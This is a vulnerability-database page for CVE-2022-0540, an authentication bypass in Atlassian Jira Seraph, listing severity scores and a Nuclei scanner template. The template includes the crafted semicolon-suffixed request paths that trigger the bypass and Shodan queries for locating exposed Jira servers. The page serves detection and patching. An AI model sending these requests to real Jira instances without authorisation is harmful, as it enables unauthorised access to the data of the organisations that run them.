Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0540
HistoryMay 06, 2022 - 9:49 a.m.

Atlassian Jira Seraph - Authentication Bypass

2022-05-0609:49:17
ProjectDiscovery
github.com
3
cve2022
atlassian
jira
exposure
auth-bypass

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.228

Percentile

96.5%

Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential disruption of business operations.
  remediation: Ensure you are using the latest version and that all security patches have been applied.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
    - https://jira.atlassian.com/browse/JRASERVER-73650
    - https://jira.atlassian.com/browse/JSDSERVER-11224
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
    epss-score: 0.2507
    epss-percentile: 0.96565
    cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: atlassian
    product: "jira_data_center"
    shodan-query:
      - "http.component:\"Atlassian Jira\""
      - http.component:"atlassian jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

http:
  - method: GET
    path:
      - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;'
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'General Insight Configuration'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2114f4e6b78ee95e3d980763ce9d6e0af1cb937f410989aa53544d632e48f5d022078d5a5fe237fbce1cdcc3f7b2bb853a60fae0b41e55f94c9a75b9dd27758daee:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.228

Percentile

96.5%